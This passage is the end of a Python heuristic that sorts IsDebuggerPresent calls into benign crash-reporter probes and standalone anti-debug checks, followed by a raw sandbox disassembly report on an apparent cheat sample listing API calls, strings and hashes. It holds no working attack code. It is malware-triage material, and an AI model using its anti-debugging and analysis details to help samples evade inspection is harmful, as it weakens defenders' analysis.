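            "verdict": "crt_fatal_error_reporter" if clears_filter else "standalone",
            "gs_probe": gs_probe,
        })
    return verdicts


# API list of the entry above, copied from this report.
GS_REPORTER_ENTRY = """
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D0F844
• IsDebuggerPresent.KERNEL32 ref: 00D0F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 00D0F93A
"""

# Constructed contrast (not from the report): a check whose result decides whether to exit.
STANDALONE_CHECK_ENTRY = """
• IsDebuggerPresent.KERNEL32 ref: 00401000
• ExitProcess.KERNEL32(00000001), ref: 00401010
"""

if __name__ == "__main__":
    for name, text in (("report entry", GS_REPORTER_ENTRY), ("constructed", STANDALONE_CHECK_ENTRY)):
        for v in classify_debugger_checks(parse_api_list(text)):
            print(f"{name}: IsDebuggerPresent @ {v['ref']:08X} -> {v['verdict']} (gs_probe={v['gs_probe']})")
```

The heuristic is deliberately narrow: it only clears a call that is immediately followed by SetUnhandledExceptionFilter(NULL), so an IsDebuggerPresent whose result feeds a branch, a sleep or a process exit stays flagged for manual review.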
                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00D0E5E8,0000001C,00D0E7DD,00000000,?,?,?,?,?,?,?,00D0E5E8,00000004,00D51CEC,00D0E86D), ref: 00D0E6B4
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D0E5E8,00000004,00D51CEC,00D0E86D), ref: 00D0E6CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D18FB5
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D18FBF
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D18FCC
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Strings
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D0AF35
• GetNumberFormatW.KERNEL32(00000400,00000000,?,00D2E72C,?,?), ref: 00D0AF84
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
APIs
• GetLastError.KERNEL32(00CF6DDF,00000000,00000400), ref: 00CF6C74
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CF6C95
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D219EF,?,?,00000008,?,?,00D2168F,00000000), ref: 00D21C21
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D0F66A
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
• GetVersionExW.KERNEL32(?), ref: 00CFB16B
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
Strings
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00D0F3A5), ref: 00D0F9DA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID:
• String ID:
• API String ID:
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                    • Instruction ID: 18cb564170249ceb415e4765df26f1b1a0c5c4debbe40a00e5d209a7cef74607
                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                    • Instruction Fuzzy Hash: 2E62B671A083458FCB15CF28C8906B9BBE1BF95304F18896DE9DA8F386D730E945CB65
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                    • Instruction ID: 28b9a3ded3da4e1d24b3172253060b22635a4a0a725f4b16ea606c2b411044ad
                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                    • Instruction Fuzzy Hash: 6E525A72A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA59CB86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c323ffb15e60b6d0ae6778d37c7f0b3425e6d09a354eb7764e7b57f1bc43c040
                                                    • Instruction ID: 05c4b15415f73d618ea137fbf6d8387f28476a2e0c382bd9c0f98ffcd44a9313
                                                    • Opcode Fuzzy Hash: c323ffb15e60b6d0ae6778d37c7f0b3425e6d09a354eb7764e7b57f1bc43c040
                                                    • Instruction Fuzzy Hash: CB12C2B1A087069FC718CF28C8907B9B7E0FB94304F14892DE99ACB680D374F995CB55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 529ee142d924428b8236a50f03b1fd22a6298bd7fa2e5222b3e1dc4e40b39f2a
                                                    • Instruction ID: e172d8a0a3fd0ec78134d9199587815dbcd47f952c41883e3e8239b03d90fc6d
                                                    • Opcode Fuzzy Hash: 529ee142d924428b8236a50f03b1fd22a6298bd7fa2e5222b3e1dc4e40b39f2a
                                                    • Instruction Fuzzy Hash: 93F1CB31A083099FC798CF28C6C463ABBE1EFC9314F145A2EF695C7256D730EA458B52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 53f0dfb2d3215306438a4cad40c361c6f2e70338d4a7697593c25f74089df16e
                                                    • Instruction ID: 96b49710816bd57638e9c2f816654c3c70e62d58dd7eb02131888e8350fca4f1
                                                    • Opcode Fuzzy Hash: 53f0dfb2d3215306438a4cad40c361c6f2e70338d4a7697593c25f74089df16e
                                                    • Instruction Fuzzy Hash: 9DD192B1A083458FDB14DF28C84475BBBE1EF89308F08456DF8899B282D774E955CB66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58ee13a44bc661eb1c951d3b38b7542eff7d40b75e5d7f05ed064e57659d6148
                                                    • Instruction ID: 6acd0808d68a0d007e42c71452852b7c1391965f32cdc06848d6a2be9b74d8dc
                                                    • Opcode Fuzzy Hash: 58ee13a44bc661eb1c951d3b38b7542eff7d40b75e5d7f05ed064e57659d6148
                                                    • Instruction Fuzzy Hash: B8E139755083949FC344CF29E89086ABFF0AF9A300F45495EF9D497392C335EA19DBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                    • Instruction ID: e9d86464110949bad6873ca48f865d787c29e22a8a64abdd14f095bd28ab7a4c
                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                    • Instruction Fuzzy Hash: 8C9126F02003499BDB28EB78D891FBA77D5EB94300F14092DE79E872C2DAA49545C776
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction ID: a92be82d23623f1084cde1003c0148f55ffe7c8c4054c5beac3e705ec09d5d32
                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction Fuzzy Hash: 558123F17043465BDB28DE68C895FBD77D4AB94304F04092DEB8E8B2C2DAA0D9858776
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b30966687a2ae5e96526122e437987892883a864cf294f426dfa3f7644b773e
                                                    • Instruction ID: 858c7ec3fd55cc27bb14fb1a2d166adda9f59896c0cc5a27da336aa6d7c75f4c
                                                    • Opcode Fuzzy Hash: 2b30966687a2ae5e96526122e437987892883a864cf294f426dfa3f7644b773e
                                                    • Instruction Fuzzy Hash: 32614666600F08F6DA345968B8957FE2394EBC2340F58051AE482DF289DEBDDDC28639
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                    • Instruction ID: 1690a9213836ee364a564e487fc5ce4b13708cc3cf2d0942a68fb988922e881a
                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                    • Instruction Fuzzy Hash: F8510361654F44F7DB3549A8B556BFF23859F86300F1C0919E882DB28ACE1DEEC683B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eea7e34ea1d695fa916b38b03c71351597b8cdcc711ed1efbd0cd961b12eabfa
                                                    • Instruction ID: 6fdd5e8d26f25f81f3848605ce5c486673a5e6992c8c497565a9efc1818f4bd4
                                                    • Opcode Fuzzy Hash: eea7e34ea1d695fa916b38b03c71351597b8cdcc711ed1efbd0cd961b12eabfa
                                                    • Instruction Fuzzy Hash: DC51C2315083998AD712CF24C1804BEBFE0EE9A714F4949ADE5D95B243C231DB4BDB63
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95af6bec40c7aed29c76c894af2a26aafbccb62c314af77a2f43a301fd762a0d
                                                    • Instruction ID: 4e13a4aa97c75bc4b67b1389d84b4afc6af313dd6c4ae54d20d64757e4baa1c8
                                                    • Opcode Fuzzy Hash: 95af6bec40c7aed29c76c894af2a26aafbccb62c314af77a2f43a301fd762a0d
                                                    • Instruction Fuzzy Hash: A251E0B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction ID: 36a5c2f6c296537817abb8c64d8a7e866b6d2cd31c9d889903f5b69a254c8f3b
                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction Fuzzy Hash: 6831E6B1A147468FCB18DF14C85126AFBE0FB95304F14462DE5C9C7381C774EA0ACBA2
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CFE30E
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D01DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D31030,00000200,00CFD928,00000000,?,00000050,00D31030), ref: 00D01DC4
                                                    • _strlen.LIBCMT ref: 00CFE32F
                                                    • SetDlgItemTextW.USER32(?,00D2E274,?), ref: 00CFE38F
                                                    • GetWindowRect.USER32(?,?), ref: 00CFE3C9
                                                    • GetClientRect.USER32(?,?), ref: 00CFE3D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFE475
                                                    • GetWindowRect.USER32(?,?), ref: 00CFE4A2
                                                    • SetWindowTextW.USER32(?,?), ref: 00CFE4DB
                                                    • GetSystemMetrics.USER32(00000008), ref: 00CFE4E3
                                                    • GetWindow.USER32(?,00000005), ref: 00CFE4EE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00CFE51B
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CFE58D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                    • String ID: $%s:$CAPTION$d
                                                    • API String ID: 2407758923-2512411981
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 00D1CB66
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C71E
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C730
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C742
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C754
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C766
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C778
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C78A
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C79C
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7AE
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7C0
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7D2
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7E4
                                                      • Part of subcall function 00D1C701: _free.LIBCMT ref: 00D1C7F6
                                                    • _free.LIBCMT ref: 00D1CB5B
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1CB7D
                                                    • _free.LIBCMT ref: 00D1CB92
                                                    • _free.LIBCMT ref: 00D1CB9D
                                                    • _free.LIBCMT ref: 00D1CBBF
                                                    • _free.LIBCMT ref: 00D1CBD2
                                                    • _free.LIBCMT ref: 00D1CBE0
                                                    • _free.LIBCMT ref: 00D1CBEB
                                                    • _free.LIBCMT ref: 00D1CC23
                                                    • _free.LIBCMT ref: 00D1CC2A
                                                    • _free.LIBCMT ref: 00D1CC47
                                                    • _free.LIBCMT ref: 00D1CC5F
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D09736
                                                    • _wcslen.LIBCMT ref: 00D097D6
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00D097E5
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D09806
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D0982D
                                                    Similarity
                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                    • API String ID: 1777411235-4209811716
                                                    APIs
                                                    • GetWindow.USER32(?,00000005), ref: 00D0D6C1
                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00D0D6ED
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0D709
                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D0D720
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0D734
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D0D75D
                                                    • DeleteObject.GDI32(00000000), ref: 00D0D764
                                                    • GetWindow.USER32(00000000,00000002), ref: 00D0D76D
                                                    Similarity
                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                    • String ID: STATIC
                                                    • API String ID: 3820355801-1882779555
                                                    APIs
                                                    • _free.LIBCMT ref: 00D19705
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
